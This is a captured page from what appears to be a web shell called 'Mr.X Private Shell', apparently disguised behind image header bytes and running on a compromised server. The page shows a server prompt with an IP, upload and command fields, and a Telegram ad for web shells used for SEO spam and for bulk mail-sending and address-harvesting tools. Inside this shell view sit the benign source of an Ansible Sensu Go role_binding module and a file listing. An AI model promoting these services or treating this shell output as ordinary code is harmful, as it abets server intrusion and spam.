����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Paul Arthur <paul.arthur@flowerysong.com>
# Copyright: (c) 2019, XLAB Steampunk <steampunk@xlab.si>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type

ANSIBLE_METADATA = {
    "metadata_version": "1.1",
    "status": ["stableinterface"],
    "supported_by": "certified",
}

DOCUMENTATION = '''
module: role_binding
author:
 - Paul Arthur (@flowerysong)
 - Manca Bizjak (@mancabizjak)
 - Aljaz Kosir (@aljazkosir)
 - Tadej Borovsak (@tadeboro)
short_description: Manage Sensu role bindings
description:
  - Create, update or delete Sensu role binding.
  - For more information, refer to the Sensu documentation at
    U(https://docs.sensu.io/sensu-go/latest/reference/rbac/#role-bindings-and-cluster-role-bindings).
version_added: 1.0.0
extends_documentation_fragment:
  - sensu.sensu_go.requirements
  - sensu.sensu_go.auth
  - sensu.sensu_go.name
  - sensu.sensu_go.namespace
  - sensu.sensu_go.state
seealso:
  - module: sensu.sensu_go.role_binding_info
  - module: sensu.sensu_go.role
  - module: sensu.sensu_go.cluster_role
  - module: sensu.sensu_go.cluster_role_binding
options:
  role:
    description:
      - Name of the role.
      - This parameter is mutually exclusive with I(cluster_role).
    type: str
  cluster_role:
    description:
      - Name of the cluster role. Note that the resulting role
        binding grants the cluster role to the provided users and
        groups in the context of I(auth.namespace) only.
      - This parameter is mutually exclusive with I(role).
    type: str
  users:
    description:
      - List of users to bind to the role or cluster role.
      - Note that at least one of I(users) and I(groups) must be
        specified when creating a role binding.
    type: list
    elements: str
  groups:
    description:
      - List of groups to bind to the role or cluster role.
      - Note that at least one of I(users) and I(groups) must be
        specified when creating a role binding.
    type: list
    elements: str
'''

EXAMPLES = '''
- name: Create a role binding
  sensu.sensu_go.role_binding:
    name: dev_and_testing
    role: testers_permissive
    groups:
      - testers
      - dev
      - ops
    users:
      - alice

- name: Create a role binding for admins
  sensu.sensu_go.role_binding:
    name: org-admins
    cluster_role: admin
    groups:
      - team1-admins
      - team2-admins

- name: Delete a role binding
  sensu.sensu_go.role_binding:
    name: org-admins
    state: absent
'''

RETURN = '''
object:
  description: Object representing Sensu role binding.
  returned: success
  type: dict
  sample:
    metadata:
      name: event-reader-binding
      namespace: default
    role_ref:
      name: event-reader
      type: Role
    subjects:
      - name: bob
        type: User
'''

from ansible.module_utils.basic import AnsibleModule

from ..module_utils import arguments, errors, utils, role_utils


def infer_role(params):
    if params["role"]:
        return "Role", params["role"]
    return "ClusterRole", params["cluster_role"]


def build_api_payload(params):
    payload = arguments.get_mutation_payload(params)
    payload["subjects"] = role_utils.build_subjects(params["groups"], params["users"])
    payload["role_ref"] = role_utils.type_name_dict(*infer_role(params))

    return payload


def main():
    required_if = [
        ("state", "present", ["role", "cluster_role"], True)  # True means any of role, cluster_role
    ]
    mutually_exclusive = [
        ["role", "cluster_role"]
    ]
    module = AnsibleModule(
        required_if=required_if,
        mutually_exclusive=mutually_exclusive,
        supports_check_mode=True,
        argument_spec=dict(
            arguments.get_spec("auth", "name", "state", "namespace"),
            role=dict(),
            cluster_role=dict(),
            users=dict(
                type="list", elements="str",
            ),
            groups=dict(
                type="list", elements="str",
            ),
        )
    )

    msg = role_utils.validate_binding_module_params(module.params)
    if msg:
        module.fail_json(msg=msg)

    client = arguments.get_sensu_client(module.params["auth"])
    path = utils.build_core_v2_path(
        module.params["namespace"], "rolebindings", module.params["name"],
    )
    payload = build_api_payload(module.params)

    try:
        changed, role_binding = utils.sync(
            module.params["state"], client, path, payload, module.check_mode, role_utils.do_role_bindings_differ
        )
        module.exit_json(changed=changed, object=role_binding)
    except errors.Error as e:
        module.fail_json(msg=str(e))


if __name__ == '__main__':
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
ad_auth_provider.py File 11.83 KB 0644
asset.py File 6.08 KB 0644
asset_info.py File 2.43 KB 0644
auth_provider_info.py File 3.51 KB 0644
bonsai_asset.py File 3.48 KB 0644
check.py File 12.24 KB 0644
check_info.py File 2.29 KB 0644
cluster.py File 2.89 KB 0644
cluster_info.py File 2.49 KB 0644
cluster_role.py File 4.31 KB 0644
cluster_role_binding.py File 3.95 KB 0644
cluster_role_binding_info.py File 2.4 KB 0644
cluster_role_info.py File 2.31 KB 0644
datastore.py File 4.87 KB 0644
datastore_info.py File 2.59 KB 0644
entity.py File 7.29 KB 0644
entity_info.py File 3.04 KB 0644
etcd_replicator.py File 6.51 KB 0644
etcd_replicator_info.py File 2.71 KB 0644
event.py File 9.54 KB 0644
event_info.py File 3.44 KB 0644
filter.py File 4.17 KB 0644
filter_info.py File 2.26 KB 0644
handler_info.py File 2.27 KB 0644
handler_set.py File 2.95 KB 0644
hook.py File 3.69 KB 0644
hook_info.py File 2.27 KB 0644
ldap_auth_provider.py File 11.07 KB 0644
mutator.py File 3.98 KB 0644
mutator_info.py File 2.33 KB 0644
namespace.py File 2.17 KB 0644
namespace_info.py File 1.92 KB 0644
oidc_auth_provider.py File 6.28 KB 0644
pipe_handler.py File 4.43 KB 0644
role.py File 4.27 KB 0644
role_binding.py File 4.73 KB 0644
role_binding_info.py File 2.37 KB 0644
role_info.py File 2.33 KB 0644
secret.py File 3.34 KB 0644
secret_info.py File 2.77 KB 0644
secrets_provider_env.py File 2.49 KB 0644
secrets_provider_info.py File 2.85 KB 0644
secrets_provider_vault.py File 7.06 KB 0644
silence.py File 4.98 KB 0644
silence_info.py File 2.93 KB 0644
socket_handler.py File 3.97 KB 0644
tessen.py File 2.66 KB 0644
user.py File 10.21 KB 0644
user_info.py File 2.19 KB 0644